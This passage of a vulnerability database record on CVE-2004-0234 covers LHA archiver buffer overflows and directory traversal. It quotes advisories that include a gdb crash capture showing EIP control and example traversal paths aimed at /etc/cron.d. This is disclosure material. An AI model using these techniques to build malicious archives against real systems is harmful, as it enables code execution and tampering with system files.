"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200408-0140",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.6,
"vendor": "f secure",
"version": "4.7"
},
{
"model": "winzip",
"scope": "eq",
"trust": 1.3,
"vendor": "winzip",
"version": "9.0"
},
{
"model": "cgpmcafee",
"scope": "eq",
"trust": 1.3,
"vendor": "stalker",
"version": "3.2"
},
{
"model": "propack",
"scope": "eq",
"trust": 1.3,
"vendor": "sgi",
"version": "3.0"
},
{
"model": "propack",
"scope": "eq",
"trust": 1.3,
"vendor": "sgi",
"version": "2.4"
},
{
"model": "winrar",
"scope": "eq",
"trust": 1.3,
"vendor": "rarlab",
"version": "3.20"
},
{
"model": "internet gatekeeper",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.32"
},
{
"model": "internet gatekeeper",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.31"
},
{
"model": "f-secure for firewalls",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.20"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.13"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.11"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.10"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.8"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.7"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.6"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.5"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.4"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.3"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.2"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.1"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.0"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.6"
},
{
"model": "f-secure internet security",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2003"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2003"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.52"
},
{
"model": "f-secure internet security",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2004"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "tsugio okamoto",
"version": "1.15"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.5"
},
{
"model": "fedora core",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "core_1.0"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "1.14i-9"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2004"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "tsugio okamoto",
"version": "1.14"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "tsugio okamoto",
"version": "1.17"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.0,
"vendor": "clearswift",
"version": "4.3.6_sp1"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.60"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "6.21"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.5"
},
{
"model": "lha for unix",
"scope": "lte",
"trust": 0.8,
"vendor": "lha for unix",
"version": "1.17"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (ws)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (ws)"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "9"
},
{
"model": "linux advanced workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1"
},
{
"model": "linux i686",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "lha-1.14i-9.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "hat fedora core1",
"scope": null,
"trust": 0.3,
"vendor": "red",
"version": null
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.17"
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.15"
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.14"
},
{
"model": "webshield smtp",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5"
},
{
"model": "webshield appliances",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan professional",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan for netapp",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan enterprise i",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan command line",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "9.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.1"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "6.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5.1"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.0.3"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "3.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "1.0"
},
{
"model": "virex",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "securityshield for microsoft isa server",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "portalshield for microsoft sharepoint",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "netshield for netware",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "managed virusscan",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "linuxshield",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for mail servers with epo",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for lotus domino",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.5"
},
{
"model": "asap virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "active virus defense smb edition",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "active threat protection",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "active mail protection",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.7"
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.6"
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.5"
},
{
"model": "internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2004"
},
{
"model": "internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2003"
},
{
"model": "anti-virus for workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for windows servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for windows servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for samba servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.60"
},
{
"model": "anti-virus for ms exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "6.21"
},
{
"model": "anti-virus for mimesweeper",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for mimesweeper",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for linux workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus for linux servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus for linux gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus client security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.52"
},
{
"model": "anti-virus client security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.50"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2004"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2003"
},
{
"model": "mailsweeper sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "clearswift",
"version": "4.3.6"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.18"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.17"
},
{
"model": "networks barracuda spam firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.03.022"
}
],
"sources": [
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:lha_for_unix_project:lha_for_unix",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:redhat:linux_advanced_workstation",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ulf Harnhammar\u203b ulfh@update.uu.se\u203bJean-S\u00e9bastien Guay-Leroux\u203b jean-sebastien@guay-leroux.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0234",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2004-0234",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-8664",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2004-0234",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2004-0234",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200408-202",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-8664",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. \nThe first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. \nThe second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. \n**NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. \n**Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. \n\nThese vulnerabilities are related to:\nSA11510\nSA19002\n\nSuccessful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------\n\nLHa buffer overflows and directory traversal problems\n\nPROGRAM: LHa (Unix version)\nVENDOR: various people\nVULNERABLE VERSIONS: 1.14d to 1.14i\n 1.17 (Linux binary)\n possibly others\nIMMUNE VERSIONS: 1.14i with my patch applied\n 1.14h with my patch applied\nLHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm\n http://www2m.biglobe.ne.jp/~dolphin/lha/prog/\nLHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/\nREFERENCES: CAN-2004-0234 (buffer overflows)\n CAN-2004-0235 (directory traversal)\n\n* DESCRIPTION *\n\nLHa is a console-based program for packing and unpacking LHarc\narchives. \n\nIt is one of the packages in Red Hat Linux, Fedora Core, SUSE\nLinux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux,\nGentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. \nIt is also included in the port/package collections for FreeBSD,\nOpenBSD and NetBSD. \n\n* OVERVIEW *\n\nLHa has two stack-based buffer overflows and two directory traversal\nproblems. They can be abused by malicious people in many different\nways: some mail virus scanners require LHa and run it automatically\non attached files in e-mail messages. Some web applications allow\nuploading and unpacking of LHarc archives. Some people set up their\nweb browsers to start LHa automatically after downloading an LHarc\narchive. Finally, social engineering is probably quite effective\nin this case. The cause of the problem is the function\nget_header() in header.c. This function first reads the lengths of\nfilenames or directory names from the archive, and then it reads\nthat many bytes to a char array (one for filenames and one for\ndirectory names) without checking if the array is big enough. \n\nBy exploiting this bug, you get control over several registers\nincluding EIP, as you can see in this session capture:\n\n$ lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ gdb lha\nGNU gdb Red Hat Linux (5.3post-0.20021129.18rh)\nCopyright 2003 Free Software Foundation, Inc. \nGDB is free software, covered by the GNU General Public License, and\nyou are welcome to change it and/or distribute copies of it under\ncertain conditions. \nType \"show copying\" to see the conditions. \nThere is absolutely no warranty for GDB. Type \"show warranty\" for\ndetails. \nThis GDB was configured as \"i386-redhat-linux-gnu\"... \n(gdb) r x buf_oflow.lha\nStarting program: /usr/bin/lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffdd50 0xbfffdd50\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210282 2163330\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) r t buf_oflow.lha\nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y\nStarting program: /usr/bin/lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffe6d0 0xbfffe6d0\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210286 2163334\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) q\nThe program is running. Exit anyway? (y or n) y\n$\n\nb) two directory traversal problems\n\nLHa has directory traversal problems, both with absolute paths\nand relative paths. There is no protection against relative paths\nat all, so you can simply use the lha binary to create an archive\nwith paths like \"../../../../../etc/cron.d/evil\". There is some\nsimple protection against absolute paths, namely skipping the first\ncharacter if it is a slash, but again you can simply use the binary\nto create archives with paths like \"//etc/cron.d/evil\". \n\n* ATTACHED FILES *\n\nI have written a patch against version 1.14i that corrects all\nfour problems. The patch is included as an attachment, together\nwith some test archives. \n\n* TIMELINE *\n\n18 Apr: contacted the vendor-sec list and the LHa 1.14 author\n18 Apr: tried to contact the LHa 1.17 author with a web form and\n a guessed e-mail address which bounced\n19 Apr: reply from the vendor-sec list with CVE references\n30 Apr: Red Hat released their advisory\n01 May: I release this advisory\n\n// Ulf Harnhammar\nAdvogato diary :: http://www.advogato.org/person/metaur/\nidiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/\nDebian Security Audit Project :: http://shellcode.org/Audit/\n\n------------------------------------------------------------------------\n. \n\nTITLE:\nZoo \"fullpath()\" File Name Handling Buffer Overflow\n\nSECUNIA ADVISORY ID:\nSA19002\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/19002/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS, System access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nzoo 2.x\nhttp://secunia.com/product/8297/\n\nDESCRIPTION:\nJean-S\\xe9bastien Guay-Leroux has discovered a vulnerability in zoo,\nwhich can be exploited by malicious people to cause a DoS (Denial of\nService) and potentially to compromise a user\u0027s system. This can be exploited to cause a\nbuffer overflow when a specially-crafted ZOO archive containing a\nfile with an overly long file and directory name is processed (e.g. \nlisting archive contents or adding new files to the archive). \n\nThe vulnerability has been confirmed in version 2.10. Other versions\nmay also be affected. \n\nSOLUTION:\nRestrict use to trusted ZOO archives. \n\nPROVIDED AND/OR DISCOVERED BY:\nJean-S\\xe9bastien Guay-Leroux\n\nORIGINAL ADVISORY:\nhttp://www.guay-leroux.com/projects/zoo-advisory.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Topic: Barracuda LHA archiver security bug leads to\n remote compromise\n\nAnnounced: 2006-04-03\nProduct: Barracuda Spam Firewall\nVendor: http://www.barracudanetworks.com/\nImpact: Remote shell access\nAffected product: Barracuda with firmware \u003c 3.3.03.022 AND\n spamdef \u003c 3.0.10045\nCredits: Jean-S\\xe9bastien Guay-Leroux\nCVE ID: CVE-2004-0234\n\n\nI. BACKGROUND\n\nThe Barracuda Spam Firewall is an integrated 